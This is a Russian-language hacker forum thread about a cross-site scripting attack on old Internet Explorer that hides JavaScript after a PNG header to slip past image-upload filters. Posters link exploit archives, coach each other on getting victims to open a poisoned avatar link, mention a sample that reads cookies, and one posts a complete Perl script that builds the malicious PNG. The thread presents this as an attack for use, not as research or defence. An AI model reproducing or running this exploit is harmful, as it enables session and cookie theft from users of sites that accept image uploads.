Пассивная XSS во всех версиях IE
уязвимо очень много ресурсов...практически все open sources проекты.
самопальные движки, форумы, гостевые и т.п.

Предистория:
---
В феврале 2006 года состояв в хакерско-флудерском клане IFF
меня заинтересовало что в некоторых ресурсах можно закачать картинку со скриптом
и в браузерах IE скрипт выполниться.
Только практически везде стоит фильтрация граффических файлов.
И тогда я за два дня сделал прорыв в XSS-строении.

Я нашёл как обходить 90% фильтров.
Дело в том что большинство картинок проверяються по хеадеру первым байтам.
Заголовку.
Я нашёл что в файлах .png формата можно вставлять скрипт после хеадера
тем самым большинство фильтров проверяя заголовок пропускали картинку
с внедрённым скриптом.
----


Хотя уязвимость я публиковал раньше...уязвимость до сех пор считаеться приват.



Авторская статья:
http://kodsweb.ru/texts/ie_graphics_xss.txt

приватный (первая експлутация уязвимости - пример):
http://www.kodsweb.ru/bugs/png_expl.rar (autor exploiting)

публичный експлойт сделал K@t00x:
http://www.kodsweb.ru/sploits/ie_xss_bypass.rar



Уязвимость в .png была представлена мной в конкурсной работе на фестивале
Chaos Constructions 2006 (SET-CMS XSS)
ftp://ftp.cc.org.ru/pub/2006/hack_video/airsg-cc6.zip

вот мой вклад в Xss-строение

а почему пассивная??

пассивная потому..что тебе надо давать жертве ссылку на загруженный скажем аватар со скриптом.
т.е. это пассивная атака.

Другое дело еслиб к приемру вставка скрипта происходила в форуме, и тебе не надо б было нечего жертве давать.

КОнечно тут спорный вопрос активная или пассивная Xss в експлойте этом.
Но я подразумевая под активной Xss это когда ты оставил внедрённый скрипт на видном месте, в форуме, в хостевой и т.п.
А под пассивной когда ты формируешь запрос или картинка со скриптом...тут тебе придёться впарить жертвее чтобы зашла на ссылку.

я бы причислил ее к полуактивным, т.к. сам код подгружается на сайт..
но не в этом дело, а в том, что не получаится у меня ее заюзать. Ты уверен, что работает во всех версиях Ie, или, может уже выходили какие-нибудь патчи от нее?

работает во всех версиях Ie со стандартными настройками безопасности.
Ты неправильно наверное её юзал.
Закачал к примеру сплойт в качестве аватары..залез в хтмл код и нашёл ссылку на аватару...если она неполная делай полный путь и вставляй в урл...вот и пассивная Xss

нефига у меня не пашет, я выставил все настройки "по умолчанию", загружаю картинку на сайт, захожу по ссылке - ничего.. (как ее можно неправильно заюзать-то?? =))
пробовал и сам сделать картинку, тоже не выходит...

"нефига у меня не пашет, я выставил все настройки "по умолчанию", загружаю картинку на сайт, захожу по ссылке - ничего.. (как ее можно неправильно заюзать-то?? =))
пробовал и сам сделать картинку, тоже не выходит..."

1) УДостоверься что у тебя браузер Internet Explorer
2) Експлойт тестировался на браузерах =< IE 6.0
3) Фильтр не загружает картинку, т.к. картинка повреждена.
- я специально написал ОБХОДИТ 90% фильтров а не 100% -
К примеру на этом форуме проверь екплойт - у меня XSS работала.
4) .....всётки я надеюсь что ты знаешь что такое пассивная XSS
=)))
вроде всё

1) Наверно мне с виндой вместо IE что то еще подсунули..
2) может у мну IE 1.0.. подойдет??
3) фильтра никакого нету - я ее на свой сайт выкладую..
4) она - полуактивная..
=))))))

Дай ссылку на ту картинку что у тебя не работает.

вот тут выложил
_http://www.exploitedpng.pochta.ru/exploited.png

===добавлено====>

в общем, я разобрался - похоже gui-версия сплоита не пашет, с помощью нее и создана картинка по ссылке выше..

рабочая картинка, выводящая куки:
_http://www.exploitedpng.pochta.ru/exploit.png

сплоит, кстати говоря, отличный (не пойму, почему у автора до сих пор так мало репы =))..

У автора уязвимости : репы вообще нет-(((

У автора публичного експлойта: K@t00x'а
думмаю репа есть=)))

эххх репа....

эххх репа....
флудер, мля... =)
кстати, имхо сплоиты в виде батника и нескольких файлов не рульно..
#!/usr/bin/perl

# Internet Explorer png XSS exploit

$poison="<html>
<script>alert('XSS')</script>
</html>"; # <== enter your html'n'javascript code here...

$a1="\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x 49\x48\x44\x52\x00\x00\x00\x01\x00\x00\x00\x01\x08 \x06\x00\x00\x00\x1F\x15\xC4\x89\x00\x00\x00\x01\x 73\x52\x47\x42\x00\xAE\xCE\x1C\xE9\x00\x00\x00\x04 \x67\x41\x4D\x41\x00\x00\xB1\x8F\x0B\xFC\x61\x05\x 00\x00\x00\x20\x63\x48\x52\x4D\x00\x00\x7A\x26\x00 \x00\x80\x84\x00\x00\xFA\x00\x00\x00\x80\xE8\x00\x 00\x75\x30\x00\x00\xEA\x60\x00\x00\x3A\x98\x00\x00 \x17\x70\x9C\xBA\x51\x3C\x00\x00\x00\x09\x70\x48\x 59\x73\x00\x00\x0B\x13\x00\x00\x0B\x13\x01\x00\x9A \x9C\x18\x00\x00\x00\x0B\x49\x44\x41\x54\x18\x57\x 63\xF8\x0F\x04\x00\x09\xFB\x03\xFD\x2B\xD5\x08\x45 \x00\x00\x00\x00\x49\x45\x4E\x44\xAE\x42\x60\x82\x 1A";

$a2="\x00\x7A\x26\x00\x00\x80\x84\x00\x00\xFA\x00\x00\x 00\x80\xE8\x00\x00\x75\x30\x00\x00\xEA\x60\x00\x00 \x3A\x98\x00\x00\x17\x70\x9C\xBA\x51\x3C\x00\x00\x 00\x09\x70\x48\x59\x73\x00\x00\x0B\x13\x00\x00\x0B \x13\x01\x00\x9A\x9C\x18\x00\x00\x00\x0B\x49\x44\x 41\x54\x18\x57\x63\xF8\x0F\x04\x00\x09\xFB\x03\xFD \x2B\xD5\x08\x45\x00\x00\x00\x00\x49\x45\x4E\x44\x AE\x42\x60\x82";

open FILE, ">exploit.png";
print FILE $a1,$poison,$a2;
close FILE;

# eof

Digimortal:
согласен что не рульно...только мой приват я хексом делал без праблов.
А паблик Кактуса мне больше нравиться чем твой пёрл-експлойтинг.
Дабы паблик на паблик и расичтан=))))
не у каждого киддиса интерпритатор пёрла есть.
Спасибо за очередную версию!